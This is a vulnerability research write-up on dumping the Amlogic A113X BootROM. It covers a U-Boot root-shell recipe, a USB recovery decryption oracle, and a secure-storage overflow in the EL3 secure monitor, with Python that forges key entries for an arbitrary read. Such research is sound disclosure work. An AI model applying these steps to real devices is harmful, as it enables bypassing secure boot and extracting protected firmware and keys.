Dumping the Amlogic A113X Bootrom

2022-12-01

[+] Introduction

While investigating the Sonos One (2nd generation) smart speaker for a potential entry into the Pwn2Own 2022 Toronto competition I got slightly (ahem) sidetracked in a small adventure relating to the bootchain of the AMLogic A113 family of chips.

This work was inspired by Frederic B’s work on AMLogic SoCs. Make sure to check out his awesome blogposts.

To quote the marketing blurb from AMLogic themselves:

With the strong computing capability of quad-core 64-bit CPU architecture, A113X can support the mainstream far-field voice recognition solutions without external DSP chip. A113X can support 8-channel PDM and multi-channel I2S. With flexible microphone array and audio input and output interfaces, A113X is a perfect choice for smart speakers and smart home applications.

The Sonos One (gen2) is based around the A113D SoC. The bootchain is surprisingly well protected. It uses the “secure boot” functionality the SoC offers, meaning all bootloader stages are encrypted and have an RSA signature attached to them. The encryption keys for these bootloaders sit in an eFUSE array that can’t (normally) be read, even by privileged (kernel) code. The U-boot that (nowadays) ships with these devices has been locked down and is protected by a password.

[+] Target board

As mentioned above, the Sonos One is not a very good board for experimentation with the A113 secure boot chain in general. I looked around for a cheap locally available alternative for experimentation and stumbled across the Lenovo Smart Clock Essential. It’s a silly little “smart clock” that (at the time) was available for ~50 EUR locally. After (finally) managing to disassemble the device I was eventually able to identify some testpoints for the UART.

Luckily, the Lenovo Clock was a bit less aggressively protected than the Sonos One. For one, the U-boot boot process can be interrupted by sending some bytes over the UART, allowing you to break into a U-boot shell. Secondly, the OTP/eFUSE on the Lenovo Clocks are configured in a way that does not disable the USB boot protocol of the bootROM.

The Lenovo Clock runs a Linux/Android based OS image. After comprehending the U-boot environment variables/scripts a bit I was able to come up with the following basic recipe to boot the thing and drop into a root shell:

setenv adb_setting run set_adb_debuggable
run preboot
run bootcmd

We’re not really interested in any of the Linux stuff, but this provided a simple way to copy out the /dev/mtd partitions to a USB mass storage device (the thing has a USB port) without having to hotair the NAND flash off or dump the flash over serial through some U-boot trickery.

After dumping the flash I learnt that even though the Lenovo U-Boot isn’t locked down, they do in fact make use of the AMLogic provided “secure boot” functionality.

This means all the bootloaders reside encrypted on the flash and their integrity is ensured by means of verifying an RSA signature.

[+] A113X Recon

Finding a datasheet/reference manual for the gritty details of the A113X was surprisingly hard. Typically these are only supplied to vendors who buy the chips for use in their products. Luckily, with some sleuthing I was able to find a Chinese “document sharing” webpage where it could be obtained. First I had to farm some credits though, by uploading some (unique) documents myself. After uploading a few (publicly available) AMLogic datasheets I was able to get the (not publicly available) datasheet in return. It happens to have a Xiaomi watermark, thanks anonymous Xiaomi (affiliated) engineer who decided to violate his NDA!

[+] ARM Trusted Firmware TL;DR

Before we move on, let’s have a quick look at a dumbed down overview of the boot path of a platform that follows the Arm Trusted Firmware reference implementation (from here on abbreviated as ATF), like the AMLogic A113X does. We’ll ignore things like the SCP (System Control Processor) for now (although it would make an interesting subject for a follow-up post) and focus on the things running on the Application Processor.

As we can see from my poorly drawn diagram, upon reset of the system execution starts in BL1, the BootROM. The BootROM will chainload BL2, which in turn will load the various BL3 stages. BL31 is the Secure Monitor code running in the highest privilege level known as EL3. BL32 is the secure-EL1 payload; on the target we’re exploring there is no BL32 payload.

The first piece of “untrusted” code that lives outside of the secure world is BL33. Typically this is where you will find a bootloader such as U-boot which in turn will chainload something like Linux.

Our goal for today is to compromise the EL3 secure monitor by running code from the untrusted (“normal world”) context!

[+] AMLogic USB recovery mode

From various online sources and by reading Frederic’s work I learnt a bit about the general boot flow of AMLogic SoCs. The USB Recovery Mode is especially interesting, as it can be interfaced with from any USB host. There are some opensource efforts of documenting and implementing this USB Recovery Mode protocol, and otherwise there’s some closed source utilities provided by AMLogic themselves.

The BootROM will check two “boot strap” pins (POC1, POC2) to determine in which order it will probe the various methods of booting the system. The following flowchart illustrates this:

The goal of all of the various boot methods is to load the next stage bootloader into memory and start running it. The next stage bootloader is called BL2. When secure boot is enforced (like on the Lenovo and Sonos target boards we have) it will only let us load correctly encrypted and signed BL2 binaries. Of course we lack the required encryption keys for encryption and private keys for signing.

By studying pyamlboot and the official aml-flash-tool binaries I was able to learn a bit about the USB protocol that is used for talking to the USB recovery code.

The USB recovery protocol uses regular USB control transfers and supports a handful of commands. The command opcode is put in bRequest of the control transfer packet(s) and things like addresses/offsets are typically sliced into two 16bit halves and stuffed into the wValue and wIndex fields. If those are foreign/alien words to you and you want to learn more about the nitty gritty details of the cursed technology that is known as USB.. I kindly refer you to USB in a nutshell.
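To make the address slicing a bit more tangible, here is a minimal Python sketch. The helper names are made up for illustration, and which half ends up in wValue versus wIndex is an assumption on my part (upper half in wValue, lower half in wIndex); check it against pyamlboot or a USB capture before relying on it.

```python
def split_address(addr):
    """Slice a 32-bit address into two 16-bit halves (wValue, wIndex).

    Assumption: the upper half travels in wValue, the lower half in wIndex.
    """
    if not 0 <= addr <= 0xFFFFFFFF:
        raise ValueError("address must fit in 32 bits")
    return (addr >> 16) & 0xFFFF, addr & 0xFFFF


def join_address(w_value, w_index):
    """Inverse of split_address(): rebuild the 32-bit address."""
    return ((w_value & 0xFFFF) << 16) | (w_index & 0xFFFF)


if __name__ == "__main__":
    # 0x12345678 is just an example value, not a meaningful SRAM address.
    w_value, w_index = split_address(0x12345678)
    print("wValue=0x%04x wIndex=0x%04x" % (w_value, w_index))
```

The two 16-bit fields are all the room a control transfer setup packet offers, which is why a 32-bit address has to be cut in half in the first place.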

Since we don’t have access to the bootROM code, we cannot study the actual implementation. Instead, we’ll rely on publicly available tools/code and some good old blackbox testing.

PyAMLBoot gives us the following table of available commands:

REQ_WRITE_MEM   = 0x01
REQ_READ_MEM    = 0x02
REQ_FILL_MEM    = 0x03
REQ_MODIFY_MEM  = 0x04
REQ_RUN_IN_ADDR = 0x05
REQ_WRITE_AUX   = 0x06
REQ_READ_AUX    = 0x07

The *_MEM operations allow for reading/writing (restricted ranges of) SRAM. The REQ_RUN_IN_ADDR operation starts decryption and verification of the BL2 image at a specified address. If verification succeeds it will jump into the BL2 entrypoint. REQ_READ_AUX and REQ_WRITE_AUX can be used to peek/poke (restricted ranges of) memory mapped IO.

[+] Secure Boot Decryption Oracle

When loading a BL2 image over USB what you do is load the BL2 image data to SRAM in chunks of 64 bytes using the REQ_WRITE_MEM command. After sending the final chunk you send a REQ_RUN_IN_ADDR command with the SRAM base address of the BL2 image that you just loaded to kick off decryption + validation + execution.
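The load sequence can be sketched as a simple plan of operations. This is a model only: plan_bl2_load and the (request, address, payload) tuples are hypothetical, the base address is whatever SRAM address you load to, and the real wire encoding of each step (including what REQ_RUN_IN_ADDR carries as payload) is not modeled here.

```python
REQ_WRITE_MEM = 0x01
REQ_RUN_IN_ADDR = 0x05
CHUNK_SIZE = 64  # BL2 is written to SRAM in chunks of 64 bytes


def plan_bl2_load(image, base_addr):
    """Return the list of (request, address, payload) steps for a BL2 load."""
    steps = []
    for offset in range(0, len(image), CHUNK_SIZE):
        chunk = image[offset:offset + CHUNK_SIZE]
        steps.append((REQ_WRITE_MEM, base_addr + offset, chunk))
    # Final step: ask the BootROM to decrypt, verify and run the image.
    steps.append((REQ_RUN_IN_ADDR, base_addr, b""))
    return steps


if __name__ == "__main__":
    # Dummy 130-byte image and a made-up base address, for illustration only.
    for req, addr, payload in plan_bl2_load(bytes(130), 0x1000):
        print("req=0x%02x addr=0x%08x len=%d" % (req, addr, len(payload)))
```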

During some blackbox fiddling with this procedure I quickly noticed a funny oversight in the behavior of REQ_RUN_IN_ADDR. The decryption of the data placed in SRAM happens in-place, and when the signature verification fails it does not bother to clear out the decrypted contents in SRAM. After a failed REQ_RUN_IN_ADDR command we are still able to follow up with additional commands, and thus we can use the REQ_READ_MEM command to read back decrypted contents! Essentially, this gives us a decryption oracle for BL2 images and any other data that is encrypted with the same algorithm/key.

Some more blackbox poking of this interface revealed the encryption is a block cipher with a block size of 16 bytes and it exhibits properties of a block cipher used in CBC mode.
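The kind of test that gives CBC away can be reproduced offline. The sketch below is an illustration under stated assumptions: toy_block_decrypt is a stand-in keyed function (not AES, and not what the BootROM uses), since on the real target the "decrypt" step is the device itself. The point is only the CBC structure: flipping one ciphertext bit garbles that plaintext block and flips the very same bit in the next one.

```python
import hashlib

BLOCK = 16


def toy_block_decrypt(key, block):
    """Stand-in for the real (unknown) block decryption function."""
    return hashlib.sha256(key + block).digest()[:BLOCK]


def cbc_decrypt(key, iv, ciphertext):
    """Textbook CBC decryption: P[i] = D(C[i]) XOR C[i-1], with C[-1] = IV."""
    out = bytearray()
    prev = iv
    for i in range(0, len(ciphertext), BLOCK):
        cur = ciphertext[i:i + BLOCK]
        dec = toy_block_decrypt(key, cur)
        out += bytes(a ^ b for a, b in zip(dec, prev))
        prev = cur
    return bytes(out)


def changed_blocks(a, b):
    """Indices of the 16-byte blocks that differ between a and b."""
    return [i // BLOCK for i in range(0, len(a), BLOCK)
            if a[i:i + BLOCK] != b[i:i + BLOCK]]


if __name__ == "__main__":
    key, iv = b"k" * 16, bytes(BLOCK)
    ct = bytes(range(64))            # four ciphertext blocks
    tampered = bytearray(ct)
    tampered[16] ^= 0x01             # flip one bit in block 1
    before = cbc_decrypt(key, iv, ct)
    after = cbc_decrypt(key, iv, bytes(tampered))
    print(changed_blocks(before, after))
```

Only blocks 1 and 2 differ between the two outputs, and block 2 differs in exactly the bit that was flipped. Seeing that pattern in data read back through REQ_READ_MEM is a strong hint for CBC with a 16 byte block size.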

Using this little trick, I corrupted some trailing bytes of a known-valid BL2 image I got from my NAND dump (which resides at the very start of mtd0) to make signature verification fail, and was able to dump the decrypted BL2 code/data for further static analysis.

[+] Reversing BL2

BL2 is responsible for loading BL31 and BL33. BL31 runs in the highest privilege context in secure world known as EL3. BL33 runs in the normal world, and typically consists of a bootloader like U-boot, which in turn will chainload something like Linux.

If we look at the UART log output from BL2 we can see:

Load FIP HDR from NAND, src: 0x0000c000, des: 0x01700000, size: 0x00004000, part: 0
Load BL3x from NAND, src: 0x00010000, des: 0x01704000, size: 0x000b0e00, part: 0
NOTICE:  BL31: v1.3(release):d3a620ec3
NOTICE:  BL31: Built : 10:32:40, Jan 20 2021
NOTICE:  BL31: AXG secure boot!
NOTICE:  BL31: BL33 decompress pass

The ‘FIP HDR’ is a table containing offsets/sizes for the various BL3x blobs. Each entry in this table has size 0x28 with a maximum of 32 entries. The layout of an entry is:

uint8_t uuid[0x10]
uint64_t offset
uint64_t size
uint64_t flags

Using the decryption oracle we used to decrypt BL2 we can also decrypt the FIP table + all BL3x data. Next, we can parse the FIP and extract the individual chunks using a simple script:

#!/usr/bin/env python3

import sys
import struct
import binascii

FIP_ENTRY_COUNT_MAX = 32
FIP_ENTRY_SIZE = 0x28

if __name__ == "__main__":
    if len(sys.argv) != 3:
        print("usage: %s <input.bin> <outputdir>" % sys.argv[0])
        exit(0)

    input_filename, output_dir = sys.argv[1:]

    d = open(input_filename, "rb").read()[0x10:]
    fip_hdr = struct.unpack("<LLQ", d[0:0x10])

    assert(fip_hdr[0] == 0xaa640001)
    assert(fip_hdr[1] == 0x12345678)

    for i in range(FIP_ENTRY_COUNT_MAX):
        offs = 0x10 + (i * FIP_ENTRY_SIZE)
        entry = d[offs:offs+FIP_ENTRY_SIZE]
        offs, size, flags = struct.unpack("<QQQ", entry[0x10:])
        uuid = entry[0:0x10]

        if uuid == b"\x00"*16: break

        uuid_str = binascii.hexlify(uuid).decode()

        print("entry #%02d: %s - offs: %08x, size: %08x, flags: %x" % (
            i, uuid_str, offs, size, flags
        ))

        if size == 0: continue

        output_filename = "%s/%02d_%08x_%s" % (
            output_dir, i, offs, uuid_str
        )

        with open(output_filename, "wb") as fh:
            fh.write(d[offs:offs+size])

$ python3 fip.py mtd1.out fip_out
#00: 9766fd3d89bee849ae5d78a140608213 - offs: 00004000, size: 0000d800
#01: 47d4086d4cfe98469b952950cbbd5a00 - offs: 00011800, size: 00031600
#02: 05d0e18953dc13478d2b500a4b7a3e38 - offs: 00042e00, size: 00000000
#03: d6d0eea7fcead54b97829934f234b6e4 - offs: 00042e00, size: 00072000
#04: f41d1486cb95e6118488842b2b01ca38 - offs: 00000188, size: 00000468
#05: 4856ccc2cc85e611a5363c970e97a0ee - offs: 000005f0, size: 00000468

Examining the extracted chunks we observe that:

UUID 9766fd3d89bee849ae5d78a140608213 = BL30
UUID 47d4086d4cfe98469b952950cbbd5a00 = BL31
UUID 05d0e18953dc13478d2b500a4b7a3e38 = empty (unused BL32 slot)
UUID d6d0eea7fcead54b97829934f234b6e4 = BL33
UUID f41d1486cb95e6118488842b2b01ca38 = metadata
UUID 4856ccc2cc85e611a5363c970e97a0ee = metadata

Great! We now have the plaintext blobs for BL31 (the EL3 secure monitor) and BL33 (U-boot)!

[+] Reversing BL31

Our goal is to dump the BootROM and eFUSE/OTP data. So we’ll need to find a way to get code running in the context of the EL3 secure monitor (BL31). I started studying the open source ATF reference implementation.

The documentation on ‘Arm SiP Services’ mentions:

SiP services are non-standard, platform-specific services offered by the silicon implementer or platform provider. They are accessed via SMC (“SMC calls”) instruction executed from Exception Levels below EL3.

This sounds like a great spot to start hunting for bugs. It involves vendor specific code that deviates from the open source reference implementation, and it can be reached from the “normal world” by invoking SMC (Secure Monitor Call) instructions.

By reading the ATF code we learn that SMC calls are divided up into “services”, of which SiP is one. These services are registered from a table of rt_svc_desc entries. These service descriptors contain (amongst other things) a name for the service and two function pointers, one for initialization (init) and another one for handling the actual secure monitor calls (handle). The SiP service is conveniently called sip_svc, so by following some references to this string constant I was quickly able to find the SiP SMC routine dispatcher.

I expected to maybe identify a handful of vendor specific SMC functions, but to my surprise there was a total of 115 of them. The handle function contains a big switch case for the various vendor specific SMC IDs and dispatches their functionality by looking up a function pointer in a big table that I call platform_ops. The platform_ops pointer is initialized by the SiP service init function and resides in the .data section of the EL3 code.

115 routines (not to mention all the subroutines they call into) is quite a bit of tedious reversing work. Luckily, a lot of it is boilerplate stuff like routines that simply return a pointer for where the shared memory buffers reside, and such. Quite a few entries in the platform_ops table were also NULL pointers, making the SiP SMC dispatcher bail if you tried to invoke any of these. After culling through it a bit we’re left with routines pertaining to (surprise) cryptographic operations, limited access to OTP/eFUSE data and a whole cluster of routines related to some “secure storage” facility.

[+] Secure Storage

The “secure storage” functionality facilitates a way of having key/value pairs encrypted with an AES key that is never visible to the normal world.

Linux (or any other OS running in the normal world at EL1/EL2) can query the secure storage, and read/write items to/from this storage using these vendor specific SMC calls.

Reversing the storage related routines reveals the following core functions that can be invoked through the SMC interface:

SMC 0x82000069 - SIP_CMD_STORAGE_PARSE:

This routine is used to parse an (encrypted) secure storage blob, it is invoked before you can actually read or write items from the storage.

SMC 0x82000061 - SIP_CMD_STORAGE_READ:

This routine is used to read an item from the secure storage. The name of the item is included in the request body.

SMC 0x82000062 - SIP_CMD_STORAGE_WRITE:

This routine is used to write/update an item in the secure storage.

SMC 0x82000068 - SIP_CMD_STORAGE_REMOVE:

This routine is used to remove an item from the secure storage.

SMC 0x82000067 - SIP_CMD_STORAGE_LIST:

This routine is used to get a list of all items (names) in the secure storage.
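The SMC IDs above are not arbitrary numbers. They follow the Arm SMC Calling Convention, where the upper bits encode the call type and the owning service. A small decoder (the function and dictionary names are mine) shows why they all start with 0x82:

```python
STORAGE_SMCS = {
    0x82000061: "SIP_CMD_STORAGE_READ",
    0x82000062: "SIP_CMD_STORAGE_WRITE",
    0x82000067: "SIP_CMD_STORAGE_LIST",
    0x82000068: "SIP_CMD_STORAGE_REMOVE",
    0x82000069: "SIP_CMD_STORAGE_PARSE",
}


def decode_smc_id(function_id):
    """Split a 32-bit SMC function identifier into its SMCCC fields."""
    return {
        "fast_call": bool((function_id >> 31) & 1),  # 1 = fast call
        "smc64": bool((function_id >> 30) & 1),      # 0 = SMC32 convention
        "owner": (function_id >> 24) & 0x3F,         # 2 = SiP service
        "function": function_id & 0xFFFF,
    }


if __name__ == "__main__":
    for smc_id, name in sorted(STORAGE_SMCS.items()):
        print("0x%08x %-24s %r" % (smc_id, name, decode_smc_id(smc_id)))
```

Every storage call decodes to a fast SMC32 call owned by entity 2, which is the SiP range, with the low 16 bits selecting the actual routine.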

To start using this secure storage we invoke SIP_CMD_STORAGE_PARSE, which accepts a single argument that contains the size of the encrypted storage blob. The actual encrypted storage blob to be parsed is written to a shared memory buffer residing in DRAM. The address of this shared buffer is fixed and can be retrieved using SMC 0x82000025; on this target it is 0x5080000.

The maximum size accepted by the SIP_CMD_STORAGE_PARSE handler is 0x40000 bytes. The storage starts with a plaintext header of size 0x200 that looks like this:

struct {
    uint8_t  magic[0x10];
    uint32_t key_version;
    uint32_t seed_mode;
    uint8_t  body_hash[0x20];
    uint8_t  padding[];
}

Following the header we will find the encrypted body containing the storage items. If the key_version field contains a value greater than 0 the parser will compute a SHA256 digest over the encrypted body and compare it to the value in body_hash. If it doesn’t match, it will bail from the remainder of the parsing logic.
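Building such a header is straightforward. The following is a minimal sketch, assuming little-endian fields, zero-filled padding and a digest taken over the complete encrypted body; build_storage_header is a hypothetical helper, and the magic string is the one the parser compares against.

```python
import hashlib
import struct

HEADER_SIZE = 0x200
MAGIC = b"AMLSECURITY"


def build_storage_header(encrypted_body, key_version=1, seed_mode=2):
    """Pack the plaintext header that precedes the encrypted body."""
    body_hash = hashlib.sha256(encrypted_body).digest()
    # "16s" pads the magic with NUL bytes up to 0x10 bytes.
    header = struct.pack("<16sII32s", MAGIC, key_version, seed_mode, body_hash)
    # Assumption: the remaining padding bytes are simply zero.
    return header.ljust(HEADER_SIZE, b"\x00")


if __name__ == "__main__":
    body = bytes(0x400)  # dummy stand-in for an encrypted body
    header = build_storage_header(body)
    print(len(header), header[:0x10])
```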

Next, the parsing routine will initially only decrypt the first 0x200 bytes of the encrypted body using AES-256 in CBC mode. We will call this first 0x200 sized block the param block. Depending on the value of seed_mode it will construct the AES key and IV being used in the following way:

seed_mode = 1:

error, invalid

seed_mode = 2:

AES key = a hardcoded value from the .data section of the EL3 code
AES IV = all zeroes

seed_mode = anything else:

AES key = 12 byte CPUID from the eFUSE/OTP concatenated with a fixed 20 byte value from the .data section
AES IV = 12 byte CPUID from the eFUSE/OTP concatenated with a fixed 4 byte value from the .data section

This is great: by picking seed_mode 2 both the key and the IV are fixed constants, so even without any knowledge of the CPUID value (though it’s easy to recover/grab) we can now encrypt our own arbitrarily constructed “secure storage” blobs and feed them to the parser!
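The key selection logic can be summarized in a few lines of Python. All constants below are zero-filled placeholders (the real values live in the BL31 .data section and are not reproduced here), the 32 byte size of the hardcoded key is an assumption that follows from AES-256, and derive_key_iv is a name made up for this sketch.

```python
HARDCODED_KEY = bytes(32)   # placeholder for the seed_mode 2 key
FIXED_KEY_TAIL = bytes(20)  # placeholder for the fixed 20 byte value
FIXED_IV_TAIL = bytes(4)    # placeholder for the fixed 4 byte value


def derive_key_iv(seed_mode, cpuid=None):
    """Return (aes_key, aes_iv) the way the parser picks them per seed_mode."""
    if seed_mode == 1:
        raise ValueError("seed_mode 1 is rejected by the parser")
    if seed_mode == 2:
        return HARDCODED_KEY, bytes(16)
    if cpuid is None or len(cpuid) != 12:
        raise ValueError("a 12 byte CPUID is required for this seed_mode")
    return cpuid + FIXED_KEY_TAIL, cpuid + FIXED_IV_TAIL


if __name__ == "__main__":
    key, iv = derive_key_iv(2)
    print(len(key), len(iv))
```

Both branches yield a 32 byte key and a 16 byte IV, which matches AES-256 in CBC mode.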

The param block contains a list of (nested) TLV (Type-Length-Value) entries which are used to describe some properties of the remaining body data. Every TLV entry is structured as a 32bit type, followed by a 32bit size, followed by size bytes of data.

The outer TLV is one of type 0x1 TYPE_PARAM_HEADER, the inner body is a single TLV with type 0x2 TYPE_ENCRYPTED_SIZE specifying the size of the rest of the body.

Following the param block we have the actual key entries which are also encoded as a list of nested TLVs.

A key entry always starts with a TLV of type TYPE_KEY_DEFINITION (0x3). The body of this TLV contains multiple TLVs describing the properties of this key entry. Possible type values for a KEY_DEFINITION are:

Type	Name	Description
0x4	`NAME_SIZE`	the length of the name
0x5	`NAME_DATA`	the actual name
0x6	`VALUE_SIZE`	the length of the value
0x7	`VALUE_DATA`	the actual value
0x8	`KEY_TYPE`	a 32bit value indicating the “type” of value
0x9	`BUFFER_STATUS`	a 32bit value indicating whether the value is “dirty”
0xa	`HASH_DATA`	a 0x20 byte SHA256 digest over the value data.
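A key definition can be assembled with a tiny TLV encoder. This is a sketch under a few assumptions: fields are little-endian, there is no alignment padding between TLVs, and the inner TLVs may appear in the order shown. The helper names are made up for illustration.

```python
import hashlib
import struct

TYPE_KEY_DEFINITION = 0x3
NAME_SIZE, NAME_DATA, VALUE_SIZE, VALUE_DATA = 0x4, 0x5, 0x6, 0x7
KEY_TYPE, BUFFER_STATUS, HASH_DATA = 0x8, 0x9, 0xA


def tlv(tlv_type, data):
    """32bit type, 32bit size, then size bytes of data."""
    return struct.pack("<II", tlv_type, len(data)) + data


def u32(value):
    return struct.pack("<I", value)


def key_definition(name, value, key_type=0, buffer_status=0):
    """Build one TYPE_KEY_DEFINITION TLV wrapping the per-key TLVs."""
    body = b"".join([
        tlv(NAME_SIZE, u32(len(name))),
        tlv(NAME_DATA, name),
        tlv(VALUE_SIZE, u32(len(value))),
        tlv(VALUE_DATA, value),
        tlv(KEY_TYPE, u32(key_type)),
        tlv(BUFFER_STATUS, u32(buffer_status)),
        tlv(HASH_DATA, hashlib.sha256(value).digest()),
    ])
    return tlv(TYPE_KEY_DEFINITION, body)


def parse_tlvs(buf):
    """Yield (type, data) pairs from a flat run of TLVs."""
    offset = 0
    while offset + 8 <= len(buf):
        tlv_type, size = struct.unpack_from("<II", buf, offset)
        yield tlv_type, buf[offset + 8:offset + 8 + size]
        offset += 8 + size


if __name__ == "__main__":
    blob = key_definition(b"XXXX", b"12345678")
    for outer_type, outer_body in parse_tlvs(blob):
        print(hex(outer_type), [hex(t) for t, _ in parse_tlvs(outer_body)])
```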

The KEY_DEFINITION entries that are correctly formed get stored internally in an array of key_entry entries that resides in the EL3 .bss, with a maximum of 64 entries. The structure of a key_entry looks like this:

// sizeof(key_entry) == 0x90
struct key_entry {
    uint8_t  name[80];
    uint32_t name_len;
    uint32_t buffer_status;
    uint32_t key_type;
    uint32_t value_size;
    uint8_t  *value_ptr;
    uint8_t  hash[0x20];
    uint32_t key_in_use;
    uint32_t unknown;
}

The key_in_use value specifies whether a key entry is valid or not, and gets set after comparing the SHA256 digest of the value against the hash.

[+] Pwning BL31

The loop in the parser code for filling this array of key_entry values looks roughly like this:

uint32_t key_entry_size_out;
g_keys_count = 0;
while (encrypted_size) {
    key_out = &g_keys[g_keys_count];
    if (parse_key(keyheap_ptr, key_out, &key_entry_size_out)) {
        goto ERROR_BAIL;
    }

    sha256(key_out->value_ptr, key_out->value_size, value_hash);
    key_hash = key_out->hash;
    if (!memcmp(key_hash, value_hash, 32)) {
        key_out->key_in_use = 1;
        ++g_keys_count;
    } else {
        key_out->key_in_use = 0;
    }

    keyheap_ptr = keyheap_ptr + key_entry_size_out;
    encrypted_size -= key_entry_size_out;
}

One obvious issue that immediately stands out is that there is no upper limit on g_keys_count being enforced leading to an overflow of g_keys, which is the array of key_entry structs. Looks like a promising bug!

Initially I tried to get code execution by using this overflow to overwrite the pointer to platform_ops at the end of .data. But doing this required roughly 3740 key_entry objects, destroying a lot of pointers/data along the way with uncontrolled data due to unfortunate alignment of certain key_entry struct members.

I studied the memory layout a bit more carefully:

0000: uint32_t  g_keys_count;
0004: key_entry g_keys[64];
2404: uint64_t  g_key_version;
240c: uint8_t   param_sector_decrypted[0x200];

There was a scratch buffer for the decrypted param block neighboring the keys array. So if we add more than 64 entries to our storage blob that is being parsed we can overwrite this scratch buffer .. that is not actually used anymore at that point. So how is this useful? The key_entry objects it will write there will be sane enough that it doesn’t really gain us anything.

If we look at the implementation of SIP_CMD_STORAGE_READ and SIP_CMD_STORAGE_WRITE we notice they both look up the corresponding key_entry by a given name. The function that does this looks like this:

int key_find_by_name(void *key_name, unsigned int match_len)
{
  int key_index;
  key_entry *current_key;

  key_index = 0;
  while (1) {
    if (key_index > g_keys_count) {
      return 0xFFFFFFFFLL;
    }
    current_key = &g_keys[key_index];
    if ( (current_key->key_in_use & 1) != 0
      && current_key->name_len == match_len
      && !(unsigned int)memcmp(&g_keys[key_index], key_name, match_len)) {
      break;
    }
    ++key_index;
  }
  return key_index;
}

This routine has a tiny but interesting quirk: rather than capping the index at min(g_keys_count, 64), it trusts that g_keys_count never exceeds the maximum capacity of g_keys.

Let’s study (a majorly trimmed down version of) the parsing function a bit more:

int parse_storage() {
    g_seed_mode = -1;
    g_key_version = -1;
    int param_parsed[2];

    if (strcmp(header.magic, "AMLSECURITY")) {
        goto ERROR_BAIL;
    }

    g_seed_mode = header.seed_mode;
    g_key_version = header.key_version;

    decrypt(param_sector_encrypted, param_sector_decrypted, 0x200);

    // parse_param_sector() returns non-zero when the param block is malformed
    if (parse_param_sector(param_sector_decrypted, param_parsed)) {
        reset_key_heap();
        memset(g_keys, 0, sizeof(key_entry) * 64);
        return 0;
    }

    g_keys_count = 0;

    decrypt(storage_body_enc, storage_body_dec, storage_body_size);

    while(encrypted_size) {
        // .. key parsing logic
    }
}

If we invoke SIP_CMD_STORAGE_PARSE a second time we can control what ends up in the param_sector_decrypted scratch buffer. Effectively this lets us forge arbitrary key_entry objects. The problem is.. invoking SIP_CMD_STORAGE_PARSE a second time will reset g_keys_count to be 0.. unless we make parse_param_sector fail; then all it will do is wipe g_keys (but only for its original maximum capacity of 64 entries), and leave g_keys_count alone! This means that keys with indices of 64 and higher will overlap with the param_sector_decrypted buffer.

Let’s examine the logic of parse_param_sector:

typedef struct {
    uint32_t encrypted_size;
    uint32_t type_11_val;
} param_block_t;

int parse_param_sector(uint8_t *param_sector_buf, param_block_t *out) {
    int result;
    int remaining;

    tlv_t *tlv_root = (tlv_t*)param_sector_buf;
    uint8_t *p = (param_sector_buf + 8);

    remaining = tlv_root->size;
    result = 0xFFFFFFFF;

    if ( tlv_root->type == 1 ) {
        while (remaining) {
            tlv_t *tlv_next = (tlv_t*)p;
            remaining -= (tlv_next->size + 8);
            if (tlv_next->type == 2) {
                out->encrypted_size = *(uint32_t*)(p + 8);
            } else if (tlv_next->type == 11 ) {
                out->type_11_val = *(uint32_t*)(p + 8);
            }
            p += (tlv_next->size + 8);
        }
        return 0;
    }

    return result;
}

As we can see it parses a nested TLV structure that needs to start with a TLV that has type 0x1 (TYPE_PARAM_HEADER). If it does not, it will return an error code. Simple!

The first key index that (partially) overlaps with param_sector_decrypted is 64, but the initial 8 bytes are occupied by the value of g_key_version, which is overwritten when we trigger storage parsing the second time. While still usable, for convenience’s sake let’s put the forged key_entry we care about into the next slot (index 65) since it fully overlaps with controlled data from param_sector_decrypted.
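The overlap is easy to double check with a bit of arithmetic on the memory layout shown earlier. The constants are taken from that layout; the helper names are mine.

```python
KEY_ENTRY_SIZE = 0x90
G_KEYS_OFFSET = 0x0004      # g_keys[] starts right after g_keys_count
PARAM_BUF_OFFSET = 0x240C   # param_sector_decrypted
PARAM_BUF_SIZE = 0x200


def key_entry_offset(index):
    """Offset of g_keys[index] relative to g_keys_count."""
    return G_KEYS_OFFSET + index * KEY_ENTRY_SIZE


def offset_in_param_buf(index):
    """Offset of g_keys[index] inside param_sector_decrypted, or None
    if the entry does not lie completely inside the buffer."""
    start = key_entry_offset(index) - PARAM_BUF_OFFSET
    if start < 0 or start + KEY_ENTRY_SIZE > PARAM_BUF_SIZE:
        return None
    return start


if __name__ == "__main__":
    for index in range(63, 68):
        print(index, hex(key_entry_offset(index)), offset_in_param_buf(index))
```

Index 64 starts at 0x2404, right on top of g_key_version, so it is only partially covered by the buffer. Index 65 starts at 0x2494, which is offset 0x88 into param_sector_decrypted, and fits entirely.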

Our forged key_entry will look like this:

Offset	Field	Value
0x00	name	“XXXX”
0x50	name_len	4
0x54	buffer_status	0
0x58	key_type	0
0x5c	value_size	8
0x60	value_ptr	ANY_POINTER_WE_LIKE
0x68	hash	0x00 * 32
0x88	key_in_use	1
0x8c	unknown	0
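In Python the forged entry can be packed with struct. This is a sketch, assuming little-endian layout without extra padding (the field offsets above work out that way), with 0x88 being the offset at which g_keys[65] lands inside param_sector_decrypted. The 0xDEADBEEF marker is arbitrary: any outer TLV type other than 1 makes parse_param_sector fail, which is what we want. The resulting buffer is plaintext and still has to be encrypted before it is handed to SIP_CMD_STORAGE_PARSE.

```python
import struct

KEY_ENTRY_FMT = "<80sIIIIQ32sII"  # mirrors struct key_entry (0x90 bytes)
FORGED_ENTRY_OFFSET = 0x88        # g_keys[65] inside param_sector_decrypted
PARAM_BLOCK_SIZE = 0x200


def forge_key_entry(name, target_addr, size=8):
    """Pack a key_entry whose value_ptr points at target_addr."""
    return struct.pack(
        KEY_ENTRY_FMT,
        name,         # name (NUL padded to 80 bytes)
        len(name),    # name_len
        0,            # buffer_status
        0,            # key_type
        size,         # value_size
        target_addr,  # value_ptr
        bytes(32),    # hash
        1,            # key_in_use
        0,            # unknown
    )


def forge_param_plaintext(name, target_addr):
    """Plaintext param block that fails parsing but carries our key_entry."""
    buf = bytearray(PARAM_BLOCK_SIZE)
    struct.pack_into("<I", buf, 0, 0xDEADBEEF)  # outer TLV type != 1
    entry = forge_key_entry(name, target_addr)
    buf[FORGED_ENTRY_OFFSET:FORGED_ENTRY_OFFSET + len(entry)] = entry
    return bytes(buf)


if __name__ == "__main__":
    # 0x05080000 is used purely as an example pointer here.
    block = forge_param_plaintext(b"XXXX", 0x05080000)
    print(len(block), block[FORGED_ENTRY_OFFSET:FORGED_ENTRY_OFFSET + 4])
```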

Now, if we trigger a SIP_CMD_STORAGE_READ operation requesting to read the value of the storage item with name XXXX it will traverse the g_keys array until it reaches our forged key_entry object and will copy key_entry.value_size (8) bytes from key_entry.value_ptr to the output buffer in shared memory, from where we can retrieve it. This gives us an arbitrary read64 primitive!

